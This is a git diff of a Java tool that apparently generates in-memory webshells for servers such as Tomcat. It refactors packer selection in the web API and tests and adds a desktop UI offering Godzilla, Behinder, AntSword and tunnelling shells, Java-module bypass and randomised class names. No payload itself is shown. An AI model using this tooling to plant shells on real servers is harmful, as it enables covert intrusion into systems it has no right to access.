||||
import com.reajason.javaweb.packer.Packer;
|
||||
import com.reajason.javaweb.packer.Packers;
|
||||
import com.reajason.javaweb.probe.ProbeShellGenerator;
|
||||
import com.reajason.javaweb.probe.ProbeShellResult;
|
||||
import com.reajason.javaweb.probe.config.ProbeConfig;
|
||||
@@ -23,11 +24,13 @@ public class ProbeShellGeneratorController {
|
||||
ProbeConfig probeConfig = request.getProbeConfig();
|
||||
ProbeContentConfig probeContentConfig = request.parseProbeContentConfig();
|
||||
ProbeShellResult generateResult = ProbeShellGenerator.generate(probeConfig, probeContentConfig);
|
||||
Packer packer = request.getPacker().getInstance();
|
||||
if (packer instanceof AggregatePacker) {
|
||||
return new ProbeShellGenerateResponse(generateResult, ((AggregatePacker) packer).packAll(generateResult.toClassPackerConfig()));
|
||||
} else {
|
||||
return new ProbeShellGenerateResponse(generateResult, packer.pack(generateResult.toClassPackerConfig()));
|
||||
if (request.getPackerSpec() == null) {
|
||||
throw new IllegalArgumentException("packerSpec is required");
|
||||
}
|
||||
Packers packers = Packers.fromName(request.getPackerSpec().getName());
|
||||
Packer packer = packers.getInstance();
|
||||
ClassPackerConfig classPackerConfig = generateResult.toClassPackerConfig();
|
||||
classPackerConfig.setCustomConfig(packer.resolveCustomConfig(request.getPackerSpec().getConfig()));
|
||||
return new ProbeShellGenerateResponse(generateResult, packer.pack(classPackerConfig));
|
||||
}
|
||||
}
|
||||
|
||||
@@ -1,7 +1,6 @@
|
||||
package com.reajason.javaweb.boot.dto;
|
||||
|
||||
import com.reajason.javaweb.memshell.config.*;
|
||||
import com.reajason.javaweb.packer.Packers;
|
||||
import lombok.Data;
|
||||
|
||||
import static com.reajason.javaweb.memshell.ShellTool.*;
|
||||
@@ -15,7 +14,7 @@ public class MemShellGenerateRequest {
|
||||
private ShellConfig shellConfig;
|
||||
private ShellToolConfigDTO shellToolConfig;
|
||||
private InjectorConfig injectorConfig;
|
||||
private Packers packer;
|
||||
private PackerRequestSpecDTO packerSpec;
|
||||
|
||||
@Data
|
||||
public static class ShellToolConfigDTO {
|
||||
@@ -84,4 +83,4 @@ public class MemShellGenerateRequest {
|
||||
default -> throw new UnsupportedOperationException("unknown shell tool " + shellConfig.getShellTool());
|
||||
};
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -1,29 +1,18 @@
|
||||
package com.reajason.javaweb.boot.dto;
|
||||
|
||||
import com.reajason.javaweb.memshell.MemShellResult;
|
||||
import lombok.AllArgsConstructor;
|
||||
import lombok.Data;
|
||||
import lombok.NoArgsConstructor;
|
||||
|
||||
import java.util.Map;
|
||||
|
||||
/**
|
||||
* @author ReaJason
|
||||
* @since 2024/12/18
|
||||
*/
|
||||
@Data
|
||||
@NoArgsConstructor
|
||||
@AllArgsConstructor
|
||||
public class MemShellGenerateResponse {
|
||||
private MemShellResult memShellResult;
|
||||
private String packResult;
|
||||
private Map<String, String> allPackResults;
|
||||
|
||||
public MemShellGenerateResponse(MemShellResult memShellResult, String packResult) {
|
||||
this.memShellResult = memShellResult;
|
||||
this.packResult = packResult;
|
||||
}
|
||||
|
||||
public MemShellGenerateResponse(MemShellResult memShellResult, Map<String, String> allPackResults) {
|
||||
this.allPackResults = allPackResults;
|
||||
this.memShellResult = memShellResult;
|
||||
}
|
||||
}
|
||||
|
||||
@@ -0,0 +1,25 @@
|
||||
package com.reajason.javaweb.boot.dto;
|
||||
|
||||
import com.reajason.javaweb.packer.spec.PackerRequestSpec;
|
||||
import lombok.Data;
|
||||
|
||||
import java.util.LinkedHashMap;
|
||||
import java.util.Map;
|
||||
|
||||
/**
|
||||
* Packer selection request payload.
|
||||
*/
|
||||
@Data
|
||||
public class PackerRequestSpecDTO {
|
||||
private String name;
|
||||
private Map<String, Object> config = new LinkedHashMap<>();
|
||||
|
||||
public PackerRequestSpec toPackerRequestSpec() {
|
||||
PackerRequestSpec spec = new PackerRequestSpec();
|
||||
spec.setName(name);
|
||||
if (config != null) {
|
||||
spec.setConfig(config);
|
||||
}
|
||||
return spec;
|
||||
}
|
||||
}
|
||||
@@ -1,6 +1,5 @@
|
||||
package com.reajason.javaweb.boot.dto;
|
||||
|
||||
import com.reajason.javaweb.packer.Packers;
|
||||
import com.reajason.javaweb.probe.config.*;
|
||||
import lombok.Data;
|
||||
|
||||
@@ -12,7 +11,7 @@ import lombok.Data;
|
||||
public class ProbeShellGenerateRequest {
|
||||
private ProbeConfig probeConfig;
|
||||
private ProbeContentConfigDTO probeContentConfig;
|
||||
private Packers packer;
|
||||
private PackerRequestSpecDTO packerSpec;
|
||||
|
||||
@Data
|
||||
static class ProbeContentConfigDTO {
|
||||
|
||||
@@ -1,29 +1,18 @@
|
||||
package com.reajason.javaweb.boot.dto;
|
||||
|
||||
import com.reajason.javaweb.probe.ProbeShellResult;
|
||||
import lombok.AllArgsConstructor;
|
||||
import lombok.Data;
|
||||
import lombok.NoArgsConstructor;
|
||||
|
||||
import java.util.Map;
|
||||
|
||||
/**
|
||||
* @author ReaJason
|
||||
* @since 2025/8/10
|
||||
*/
|
||||
@Data
|
||||
@NoArgsConstructor
|
||||
@AllArgsConstructor
|
||||
public class ProbeShellGenerateResponse {
|
||||
private ProbeShellResult probeShellResult;
|
||||
private String packResult;
|
||||
private Map<String, String> allPackResults;
|
||||
|
||||
public ProbeShellGenerateResponse(ProbeShellResult probeShellResult, String packResult) {
|
||||
this.probeShellResult = probeShellResult;
|
||||
this.packResult = packResult;
|
||||
}
|
||||
|
||||
public ProbeShellGenerateResponse(ProbeShellResult probeShellResult, Map<String, String> allPackResults) {
|
||||
this.allPackResults = allPackResults;
|
||||
this.probeShellResult = probeShellResult;
|
||||
}
|
||||
}
|
||||
|
||||
@@ -1,10 +0,0 @@
|
||||
package com.reajason.javaweb.boot.vo;
|
||||
|
||||
import java.util.List;
|
||||
|
||||
/**
|
||||
* @author ReaJason
|
||||
* @since 2026/6/27
|
||||
*/
|
||||
public record PackerVO(String name, List<String> children) {
|
||||
}
|
||||
+9
-54
@@ -1,21 +1,20 @@
|
||||
package com.reajason.javaweb.boot.controller;
|
||||
|
||||
import com.reajason.javaweb.memshell.ServerFactory;
|
||||
import com.reajason.javaweb.probe.generator.response.ResponseBodyGenerator;
|
||||
import org.junit.jupiter.api.BeforeEach;
|
||||
import org.junit.jupiter.api.Test;
|
||||
import org.springframework.beans.factory.annotation.Autowired;
|
||||
import org.springframework.boot.test.context.SpringBootTest;
|
||||
import org.springframework.boot.test.web.server.LocalServerPort;
|
||||
import org.springframework.core.ParameterizedTypeReference;
|
||||
import org.springframework.boot.test.web.client.TestRestTemplate;
|
||||
import org.springframework.http.HttpStatus;
|
||||
import org.springframework.http.ResponseEntity;
|
||||
import org.springframework.web.client.RestClient;
|
||||
|
||||
import java.util.List;
|
||||
import java.util.Map;
|
||||
import java.util.Objects;
|
||||
|
||||
import static org.junit.jupiter.api.Assertions.assertEquals;
|
||||
import static org.junit.jupiter.api.Assertions.assertFalse;
|
||||
import static org.junit.jupiter.api.Assertions.assertNotNull;
|
||||
import static org.junit.jupiter.api.Assertions.assertTrue;
|
||||
|
||||
/**
|
||||
* @author ReaJason
|
||||
@@ -25,64 +24,20 @@ import static org.junit.jupiter.api.Assertions.assertNotNull;
|
||||
@SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT)
|
||||
public class ConfigControllerIntegrationTest {
|
||||
|
||||
private static final ParameterizedTypeReference<Map<String, Object>> MAP_TYPE = new ParameterizedTypeReference<>() {
|
||||
};
|
||||
|
||||
private static final ParameterizedTypeReference<List<String>> STRING_LIST_TYPE = new ParameterizedTypeReference<>() {
|
||||
};
|
||||
|
||||
@LocalServerPort
|
||||
private int port;
|
||||
|
||||
private RestClient restClient;
|
||||
|
||||
@BeforeEach
|
||||
void setUp() {
|
||||
restClient = RestClient.builder()
|
||||
.baseUrl("http://localhost:" + port)
|
||||
.build();
|
||||
}
|
||||
@Autowired
|
||||
private TestRestTemplate restTemplate;
|
||||
|
||||
@Test
|
||||
public void testConfigEndpoint() {
|
||||
ResponseEntity<Map<String, Object>> response = restClient.get()
|
||||
.uri("/api/config")
|
||||
.retrieve()
|
||||
.toEntity(MAP_TYPE);
|
||||
ResponseEntity<Map> response = restTemplate.getForEntity("/api/config", Map.class);
|
||||
assertEquals(HttpStatus.OK, response.getStatusCode());
|
||||
assertNotNull(response.getBody());
|
||||
assertEquals(ServerFactory.getSupportedServers(), List.copyOf(response.getBody().keySet()));
|
||||
}
|
||||
|
||||
@Test
|
||||
public void testConfigServersEndpoint() {
|
||||
ResponseEntity<Map<String, Object>> response = restClient.get()
|
||||
.uri("/api/config/servers")
|
||||
.retrieve()
|
||||
.toEntity(MAP_TYPE);
|
||||
ResponseEntity<Map> response = restTemplate.getForEntity("/api/config/servers", Map.class);
|
||||
assertEquals(HttpStatus.OK, response.getStatusCode());
|
||||
assertNotNull(response.getBody());
|
||||
assertEquals(ServerFactory.getSupportedServers(), List.copyOf(response.getBody().keySet()));
|
||||
}
|
||||
|
||||
@Test
|
||||
public void testConfigPackersEndpoint() {
|
||||
ResponseEntity<List<String>> response = restClient.get()
|
||||
.uri("/api/config/packers")
|
||||
.retrieve()
|
||||
.toEntity(STRING_LIST_TYPE);
|
||||
assertEquals(HttpStatus.OK, response.getStatusCode());
|
||||
assertNotNull(response.getBody());
|
||||
}
|
||||
|
||||
@Test
|
||||
public void testConfigProbeResponseBodyServersEndpoint() {
|
||||
ResponseEntity<List<String>> response = restClient.get()
|
||||
.uri("/api/config/probe/response-body/servers")
|
||||
.retrieve()
|
||||
.toEntity(STRING_LIST_TYPE);
|
||||
assertEquals(HttpStatus.OK, response.getStatusCode());
|
||||
assertNotNull(response.getBody());
|
||||
assertEquals(ResponseBodyGenerator.getSupportedServers(), response.getBody());
|
||||
}
|
||||
}
|
||||
|
||||
+31
-23
@@ -3,18 +3,19 @@ package com.reajason.javaweb.boot.controller;
|
||||
import com.reajason.javaweb.Server;
|
||||
import com.reajason.javaweb.boot.dto.MemShellGenerateRequest;
|
||||
import com.reajason.javaweb.boot.dto.MemShellGenerateResponse;
|
||||
import com.reajason.javaweb.boot.dto.PackerRequestSpecDTO;
|
||||
import com.reajason.javaweb.memshell.ShellTool;
|
||||
import com.reajason.javaweb.memshell.ShellType;
|
||||
import com.reajason.javaweb.memshell.config.InjectorConfig;
|
||||
import com.reajason.javaweb.memshell.config.ShellConfig;
|
||||
import com.reajason.javaweb.packer.Packers;
|
||||
import org.junit.jupiter.api.BeforeEach;
|
||||
import org.junit.jupiter.api.Test;
|
||||
import org.springframework.beans.factory.annotation.Autowired;
|
||||
import org.springframework.boot.test.context.SpringBootTest;
|
||||
import org.springframework.boot.test.web.server.LocalServerPort;
|
||||
import org.springframework.boot.test.web.client.TestRestTemplate;
|
||||
import org.springframework.http.HttpStatus;
|
||||
import org.springframework.http.ResponseEntity;
|
||||
import org.springframework.web.client.RestClient;
|
||||
|
||||
import java.util.Map;
|
||||
|
||||
import static org.junit.jupiter.api.Assertions.assertEquals;
|
||||
import static org.junit.jupiter.api.Assertions.assertNotNull;
|
||||
@@ -26,20 +27,28 @@ import static org.junit.jupiter.api.Assertions.assertNotNull;
|
||||
@SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT)
|
||||
class MemShellGeneratorControllerTest {
|
||||
|
||||
@LocalServerPort
|
||||
private int port;
|
||||
|
||||
private RestClient restClient;
|
||||
|
||||
@BeforeEach
|
||||
void setUp() {
|
||||
restClient = RestClient.builder()
|
||||
.baseUrl("http://localhost:" + port)
|
||||
.build();
|
||||
}
|
||||
@Autowired
|
||||
TestRestTemplate restTemplate;
|
||||
|
||||
@Test
|
||||
void generateShell() {
|
||||
MemShellGenerateRequest request = buildRequest("ScriptEngine", null);
|
||||
ResponseEntity<MemShellGenerateResponse> response = restTemplate.postForEntity(
|
||||
"/api/memshell/generate", request, MemShellGenerateResponse.class);
|
||||
assertEquals(HttpStatus.OK, response.getStatusCode());
|
||||
assertNotNull(response.getBody());
|
||||
}
|
||||
|
||||
@Test
|
||||
void generateJspxShellWithCustomConfig() {
|
||||
MemShellGenerateRequest request = buildRequest("JSPX", Map.of("unicode", true));
|
||||
ResponseEntity<MemShellGenerateResponse> response = restTemplate.postForEntity(
|
||||
"/api/memshell/generate", request, MemShellGenerateResponse.class);
|
||||
assertEquals(HttpStatus.OK, response.getStatusCode());
|
||||
assertNotNull(response.getBody());
|
||||
}
|
||||
|
||||
private static MemShellGenerateRequest buildRequest(String packerName, Map<String, Object> packerConfig) {
|
||||
MemShellGenerateRequest request = new MemShellGenerateRequest();
|
||||
request.setShellConfig(ShellConfig.builder()
|
||||
.server(Server.Tomcat)
|
||||
@@ -53,19 +62,18 @@ class MemShellGeneratorControllerTest {
|
||||
request.setInjectorConfig(InjectorConfig.builder()
|
||||
.urlPattern("/*")
|
||||
.build());
|
||||
request.setPacker(Packers.ScriptEngine);
|
||||
PackerRequestSpecDTO packerRequestSpecDTO = new PackerRequestSpecDTO();
|
||||
packerRequestSpecDTO.setName(packerName);
|
||||
if (packerConfig != null) {
|
||||
packerRequestSpecDTO.setConfig(packerConfig);
|
||||
}
|
||||
request.setPackerSpec(packerRequestSpecDTO);
|
||||
MemShellGenerateRequest.ShellToolConfigDTO shellToolConfigDTO = new MemShellGenerateRequest.ShellToolConfigDTO();
|
||||
shellToolConfigDTO.setGodzillaKey("key");
|
||||
shellToolConfigDTO.setGodzillaPass("pass");
|
||||
shellToolConfigDTO.setHeaderName("User-Agent");
|
||||
shellToolConfigDTO.setHeaderValue("hello");
|
||||
request.setShellToolConfig(shellToolConfigDTO);
|
||||
ResponseEntity<MemShellGenerateResponse> response = restClient.post()
|
||||
.uri("/api/memshell/generate")
|
||||
.body(request)
|
||||
.retrieve()
|
||||
.toEntity(MemShellGenerateResponse.class);
|
||||
assertEquals(HttpStatus.OK, response.getStatusCode());
|
||||
assertNotNull(response.getBody());
|
||||
return request;
|
||||
}
|
||||
}
|
||||
|
||||
+5
-2
@@ -1,6 +1,7 @@
|
||||
plugins {
|
||||
id("java")
|
||||
id("idea")
|
||||
id("com.vanniktech.maven.publish") version "0.35.0" apply false
|
||||
}
|
||||
|
||||
idea {
|
||||
@@ -9,16 +10,18 @@ idea {
|
||||
}
|
||||
}
|
||||
|
||||
version = "2.10.0"
|
||||
version = "2.7.0-SNAPSHOT"
|
||||
|
||||
tasks.register("publishAllToMavenCentral") {
|
||||
dependsOn(":memshell-party-common:publishToMavenCentral")
|
||||
dependsOn(":packer:publishToMavenCentral")
|
||||
dependsOn(":generator:publishToMavenCentral")
|
||||
dependsOn(":thirdparty:thirdparty-tomcat:publishToMavenCentral")
|
||||
}
|
||||
|
||||
tasks.register("publishAllToMavenLocal") {
|
||||
dependsOn(":memshell-party-common:publishToMavenLocal")
|
||||
dependsOn(":packer:publishToMavenLocal")
|
||||
dependsOn(":generator:publishToMavenLocal")
|
||||
}
|
||||
dependsOn(":thirdparty:thirdparty-tomcat:publishToMavenLocal")
|
||||
}
|
||||
|
||||
@@ -0,0 +1,33 @@
|
||||
plugins {
|
||||
id("java")
|
||||
id("application")
|
||||
}
|
||||
|
||||
group = "com.reajason.javaweb"
|
||||
version = rootProject.version
|
||||
|
||||
java {
|
||||
toolchain {
|
||||
languageVersion = JavaLanguageVersion.of(8)
|
||||
}
|
||||
sourceCompatibility = JavaVersion.VERSION_1_8
|
||||
targetCompatibility = JavaVersion.VERSION_1_8
|
||||
}
|
||||
|
||||
dependencies {
|
||||
implementation(project(":generator"))
|
||||
implementation(project(":packer"))
|
||||
implementation("com.formdev:flatlaf:3.7")
|
||||
implementation("com.miglayout:miglayout-swing:5.3")
|
||||
|
||||
testImplementation(libs.junit.jupiter)
|
||||
testRuntimeOnly(libs.junit.platform.launcher)
|
||||
}
|
||||
|
||||
application {
|
||||
mainClass.set("com.reajason.javaweb.desktop.memshell.MemShellDesktopApplication")
|
||||
}
|
||||
|
||||
tasks.test {
|
||||
useJUnitPlatform()
|
||||
}
|
||||
+13
@@ -0,0 +1,13 @@
|
||||
package com.reajason.javaweb.desktop.memshell;
|
||||
|
||||
import com.formdev.flatlaf.FlatLightLaf;
|
||||
import com.reajason.javaweb.desktop.memshell.ui.MemShellGeneratorFrame;
|
||||
|
||||
import javax.swing.*;
|
||||
|
||||
public class MemShellDesktopApplication {
|
||||
public static void main(String[] args) {
|
||||
FlatLightLaf.setup();
|
||||
SwingUtilities.invokeLater(() -> new MemShellGeneratorFrame().setVisible(true));
|
||||
}
|
||||
}
|
||||
+331
@@ -0,0 +1,331 @@
|
||||
package com.reajason.javaweb.desktop.memshell.controller;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
||||
import com.reajason.javaweb.desktop.memshell.model.PackerCategoryModel;
|
||||
import com.reajason.javaweb.desktop.memshell.model.PackerEntryModel;
|
||||
import com.reajason.javaweb.desktop.memshell.model.PackerSchemaFieldModel;
|
||||
import com.reajason.javaweb.desktop.memshell.service.ConfigCatalogService;
|
||||
import com.reajason.javaweb.desktop.memshell.validation.MemShellValidator;
|
||||
import com.reajason.javaweb.memshell.ShellTool;
|
||||
|
||||
import java.util.*;
|
||||
|
||||
public class MemShellFormController {
|
||||
private final ConfigCatalogService configCatalogService;
|
||||
private final MemShellValidator validator;
|
||||
private final ConfigCatalogService.ConfigCatalog catalog;
|
||||
private final MemShellFormState state = new MemShellFormState();
|
||||
|
||||
public MemShellFormController(ConfigCatalogService configCatalogService, MemShellValidator validator) {
|
||||
this.configCatalogService = configCatalogService;
|
||||
this.validator = validator;
|
||||
this.catalog = configCatalogService.load();
|
||||
reconcileAfterServerChange(true);
|
||||
reconcilePackerSelection();
|
||||
}
|
||||
|
||||
public ConfigCatalogService getConfigCatalogService() { return configCatalogService; }
|
||||
public MemShellFormState getState() { return state; }
|
||||
public ConfigCatalogService.ConfigCatalog getCatalog() { return catalog; }
|
||||
public MemShellValidator getValidator() { return validator; }
|
||||
|
||||
public List<String> getServers() {
|
||||
return new ArrayList<>(catalog.getServers().keySet());
|
||||
}
|
||||
|
||||
public List<String> getServerVersionOptions() {
|
||||
return configCatalogService.getServerVersionOptions(state.getServer());
|
||||
}
|
||||
|
||||
public List<String> getShellTools() {
|
||||
Map<String, List<String>> toolMap = catalog.getCore().get(state.getServer());
|
||||
if (toolMap == null) return Collections.emptyList();
|
||||
LinkedHashSet<String> tools = new LinkedHashSet<>(toolMap.keySet());
|
||||
tools.add(ShellTool.Custom);
|
||||
return new ArrayList<>(tools);
|
||||
}
|
||||
|
||||
public List<String> getCustomShellTypes() {
|
||||
List<String> values = catalog.getServers().get(state.getServer());
|
||||
return new ArrayList<String>(values == null ? Collections.<String>emptyList() : values);
|
||||
}
|
||||
|
||||
public List<String> getShellTypesForCurrentTool() {
|
||||
Map<String, List<String>> toolMap = catalog.getCore().get(state.getServer());
|
||||
if (toolMap == null) return Collections.emptyList();
|
||||
if (ShellTool.Custom.equals(state.getShellTool())) {
|
||||
return getCustomShellTypes();
|
||||
}
|
||||
List<String> values = toolMap.get(state.getShellTool());
|
||||
return new ArrayList<String>(values == null ? Collections.<String>emptyList() : values);
|
||||
}
|
||||
|
||||
public List<PackerEntryModel> getFilteredPackers() {
|
||||
List<PackerEntryModel> out = new ArrayList<>();
|
||||
for (PackerCategoryModel c : catalog.getPackers()) {
|
||||
for (PackerEntryModel p : c.getPackers()) {
|
||||
if (p.isCategoryAnchor()) continue;
|
||||
String name = p.getName();
|
||||
String shellType = state.getShellType();
|
||||
String server = state.getServer();
|
||||
if (shellType != null && shellType.startsWith("Agent")) {
|
||||
if (name.startsWith("Agent")) out.add(p);
|
||||
continue;
|
||||
}
|
||||
if (server != null && server.startsWith("XXL")) {
|
||||
if (!name.startsWith("Agent")) out.add(p);
|
||||
continue;
|
||||
}
|
||||
if (!name.startsWith("Agent") && !name.toLowerCase(Locale.ROOT).startsWith("xxl")) {
|
||||
out.add(p);
|
||||
}
|
||||
}
|
||||
}
|
||||
return out;
|
||||
}
|
||||
|
||||
public PackerEntryModel getSelectedPackerEntry() {
|
||||
String selected = state.getPackingMethod();
|
||||
if (selected == null || selected.trim().isEmpty()) return null;
|
||||
for (PackerCategoryModel c : catalog.getPackers()) {
|
||||
for (PackerEntryModel p : c.getPackers()) {
|
||||
if (selected.equals(p.getName())) return p;
|
||||
}
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
public List<PackerSchemaFieldModel> getSelectedPackerFields() {
|
||||
PackerEntryModel p = getSelectedPackerEntry();
|
||||
return p == null ? Collections.<PackerSchemaFieldModel>emptyList() : p.getFields();
|
||||
}
|
||||
|
||||
public List<String> getCommandEncryptors() { return catalog.getCommandEncryptors(); }
|
||||
public List<String> getCommandImplementationClasses() { return catalog.getCommandImplementationClasses(); }
|
||||
|
||||
public void setServer(String server) {
|
||||
state.setServer(server);
|
||||
reconcileAfterServerChange(false);
|
||||
reconcilePackerSelection();
|
||||
}
|
||||
|
||||
public void setServerVersion(String version) { state.setServerVersion(version); }
|
||||
|
||||
public void setTargetJdkVersion(String value) {
|
||||
state.setTargetJdkVersion(value);
|
||||
try {
|
||||
state.setByPassJavaModule(Integer.parseInt(value) >= 53);
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
}
|
||||
|
||||
public void setShellTool(String tool) {
|
||||
handleShellToolChange(tool);
|
||||
reconcilePackerSelection();
|
||||
}
|
||||
|
||||
public void setShellType(String shellType) {
|
||||
state.setShellType(shellType);
|
||||
state.setUrlPattern("");
|
||||
reconcilePackerSelection();
|
||||
}
|
||||
|
||||
public void setUrlPattern(String urlPattern) { state.setUrlPattern(urlPattern); }
|
||||
public void setDebug(boolean value) { state.setDebug(value); }
|
||||
public void setProbe(boolean value) { state.setProbe(value); }
|
||||
public void setByPassJavaModule(boolean value) { state.setByPassJavaModule(value); }
|
||||
public void setLambdaSuffix(boolean value) { state.setLambdaSuffix(value); }
|
||||
public void setShrink(boolean value) { state.setShrink(value); }
|
||||
public void setStaticInitialize(boolean value) { state.setStaticInitialize(value); }
|
||||
|
||||
public void setGodzillaPass(String v) { state.setGodzillaPass(v); }
|
||||
public void setGodzillaKey(String v) { state.setGodzillaKey(v); }
|
||||
public void setBehinderPass(String v) { state.setBehinderPass(v); }
|
||||
public void setAntSwordPass(String v) { state.setAntSwordPass(v); }
|
||||
public void setCommandParamName(String v) { state.setCommandParamName(v); }
|
||||
public void setCommandTemplate(String v) { state.setCommandTemplate(v); }
|
||||
public void setHeaderName(String v) { state.setHeaderName(v); }
|
||||
public void setHeaderValue(String v) { state.setHeaderValue(v); }
|
||||
public void setShellClassBase64(String v) { state.setShellClassBase64(v); }
|
||||
public void setEncryptor(String v) { state.setEncryptor(v); }
|
||||
public void setImplementationClass(String v) { state.setImplementationClass(v); }
|
||||
|
||||
public void setShellClassName(String v) {
|
||||
state.setShellClassName(v);
|
||||
autoDisableRandomIfManualNames();
|
||||
}
|
||||
|
||||
public void setInjectorClassName(String v) {
|
||||
state.setInjectorClassName(v);
|
||||
autoDisableRandomIfManualNames();
|
||||
}
|
||||
|
||||
public void setRandomClassName(boolean checked) {
|
||||
state.setRandomClassName(checked);
|
||||
if (checked) {
|
||||
state.setSavedShellClassName(state.getShellClassName());
|
||||
state.setSavedInjectorClassName(state.getInjectorClassName());
|
||||
state.setShellClassName("");
|
||||
state.setInjectorClassName("");
|
||||
} else {
|
||||
state.setShellClassName(state.getSavedShellClassName());
|
||||
state.setInjectorClassName(state.getSavedInjectorClassName());
|
||||
}
|
||||
}
|
||||
|
||||
public void setCustomInputMode(String mode) { state.setCustomInputMode(mode); }
|
||||
|
||||
public void setPacker(String packerName) {
|
||||
state.setPackingMethod(packerName);
|
||||
resetPackerCustomConfigToDefaults();
|
||||
}
|
||||
|
||||
public void setPackerCustomField(String key, Object value) {
|
||||
if (value == null) {
|
||||
state.getPackerCustomConfig().remove(key);
|
||||
} else {
|
||||
state.getPackerCustomConfig().put(key, value);
|
||||
}
|
||||
}
|
||||
|
||||
public Map<String, Object> getPackerCustomConfig() { return state.getPackerCustomConfig(); }
|
||||
|
||||
public boolean isUrlPatternVisible() {
|
||||
return validator.needsUrlPattern(state.getShellType());
|
||||
}
|
||||
|
||||
public boolean isCommandHeaderVisible() {
|
||||
return "BypassNginxWebSocket".equals(state.getShellType()) || "BypassNginxJakartaWebSocket".equals(state.getShellType());
|
||||
}
|
||||
|
||||
public boolean isProxyHeaderVisible() { return isCommandHeaderVisible(); }
|
||||
|
||||
public boolean isCommandParamVisible() {
|
||||
return state.getShellType() == null || !state.getShellType().contains("WebSocket");
|
||||
}
|
||||
|
||||
public MemShellValidator.Result validate() { return validator.validate(state); }
|
||||
|
||||
private void reconcileAfterServerChange(boolean initial) {
|
||||
List<String> serverVersions = getServerVersionOptions();
|
||||
if (!serverVersions.contains(state.getServerVersion())) {
|
||||
state.setServerVersion(serverVersions.get(0));
|
||||
}
|
||||
Map<String, List<String>> toolMap = catalog.getCore().get(state.getServer());
|
||||
if (toolMap == null || toolMap.isEmpty()) {
|
||||
return;
|
||||
}
|
||||
List<String> toolKeys = new ArrayList<>(toolMap.keySet());
|
||||
String currentTool = state.getShellTool();
|
||||
String nextTool = toolMap.containsKey(currentTool) ? currentTool : toolKeys.get(0);
|
||||
state.setShellTool(nextTool);
|
||||
|
||||
String currentTargetJdk = state.getTargetJdkVersion();
|
||||
int currentJdk = parseInt(currentTargetJdk, 50);
|
||||
boolean raise = ("SpringWebFlux".equals(state.getServer()) || "XXLJOB".equals(state.getServer())) && currentJdk <= 52;
|
||||
state.setTargetJdkVersion(raise ? "52" : "50");
|
||||
state.setByPassJavaModule(parseInt(state.getTargetJdkVersion(), 50) >= 53);
|
||||
if (!initial) {
|
||||
state.setUrlPattern("");
|
||||
}
|
||||
|
||||
if (!serverVersions.contains(state.getServerVersion())) {
|
||||
state.setServerVersion(serverVersions.get(0));
|
||||
}
|
||||
ensureShellTypeValidForCurrentTool();
|
||||
}
|
||||
|
||||
private void ensureShellTypeValidForCurrentTool() {
|
||||
List<String> shellTypes = getShellTypesForCurrentTool();
|
||||
if (shellTypes.isEmpty()) {
|
||||
state.setShellType("");
|
||||
return;
|
||||
}
|
||||
if (!shellTypes.contains(state.getShellType())) {
|
||||
state.setShellType(shellTypes.get(0));
|
||||
}
|
||||
}
|
||||
|
||||
private void handleShellToolChange(String value) {
|
||||
if (value == null || value.trim().isEmpty()) return;
|
||||
|
||||
state.setUrlPattern("");
|
||||
state.setShellClassName("");
|
||||
state.setInjectorClassName("");
|
||||
|
||||
if (ShellTool.Command.equals(value)) {
|
||||
state.setCommandParamName("");
|
||||
state.setImplementationClass("");
|
||||
state.setEncryptor("");
|
||||
} else if (ShellTool.Godzilla.equals(value)) {
|
||||
state.setGodzillaKey("");
|
||||
state.setGodzillaPass("");
|
||||
state.setHeaderName("User-Agent");
|
||||
state.setHeaderValue("");
|
||||
} else if (ShellTool.Behinder.equals(value)) {
|
||||
state.setBehinderPass("");
|
||||
state.setHeaderName("User-Agent");
|
||||
state.setHeaderValue("");
|
||||
} else if (ShellTool.Suo5.equals(value) || ShellTool.Suo5v2.equals(value)) {
|
||||
state.setHeaderName("User-Agent");
|
||||
state.setHeaderValue("");
|
||||
} else if (ShellTool.AntSword.equals(value)) {
|
||||
state.setAntSwordPass("");
|
||||
state.setHeaderName("User-Agent");
|
||||
state.setHeaderValue("");
|
||||
} else if (ShellTool.NeoreGeorg.equals(value)) {
|
||||
state.setHeaderName("Referer");
|
||||
state.setHeaderValue("");
|
||||
} else if (ShellTool.Custom.equals(value)) {
|
||||
state.setShellClassBase64("");
|
||||
} else if (ShellTool.Proxy.equals(value)) {
|
||||
state.setHeaderName("User-Agent");
|
||||
state.setHeaderValue("");
|
||||
}
|
||||
|
||||
state.setShellTool(value);
|
||||
ensureShellTypeValidForCurrentTool();
|
||||
}
|
||||
|
||||
private void reconcilePackerSelection() {
|
||||
List<PackerEntryModel> filtered = getFilteredPackers();
|
||||
if (filtered.isEmpty()) {
|
||||
state.setPackingMethod("");
|
||||
state.getPackerCustomConfig().clear();
|
||||
return;
|
||||
}
|
||||
boolean exists = filtered.stream().anyMatch(p -> p.getName().equals(state.getPackingMethod()));
|
||||
if (!exists) {
|
||||
state.setPackingMethod(filtered.get(0).getName());
|
||||
resetPackerCustomConfigToDefaults();
|
||||
} else if (state.getPackerCustomConfig().isEmpty()) {
|
||||
resetPackerCustomConfigToDefaults();
|
||||
}
|
||||
}
|
||||
|
||||
private void resetPackerCustomConfigToDefaults() {
|
||||
state.getPackerCustomConfig().clear();
|
||||
PackerEntryModel selected = getSelectedPackerEntry();
|
||||
if (selected != null) {
|
||||
state.getPackerCustomConfig().putAll(selected.getDefaultConfig());
|
||||
}
|
||||
}
|
||||
|
||||
private void autoDisableRandomIfManualNames() {
|
||||
if (state.isRandomClassName() && (!state.getShellClassName().trim().isEmpty() || !state.getInjectorClassName().trim().isEmpty())) {
|
||||
state.setRandomClassName(false);
|
||||
}
|
||||
if (!state.isRandomClassName()) {
|
||||
state.setSavedShellClassName(state.getShellClassName());
|
||||
state.setSavedInjectorClassName(state.getInjectorClassName());
|
||||
}
|
||||
}
|
||||
|
||||
private int parseInt(String v, int d) {
|
||||
try {
|
||||
return Integer.parseInt(v);
|
||||
} catch (Exception e) {
|
||||
return d;
|
||||
}
|
||||
}
|
||||
}
|
||||
+25
@@ -0,0 +1,25 @@
|
||||
package com.reajason.javaweb.desktop.memshell.model;
|
||||
|
||||
import com.reajason.javaweb.memshell.MemShellResult;
|
||||
|
||||
public class DesktopMemShellGenerateResult {
|
||||
private final MemShellResult memShellResult;
|
||||
private final String packMethod;
|
||||
private final String packResult;
|
||||
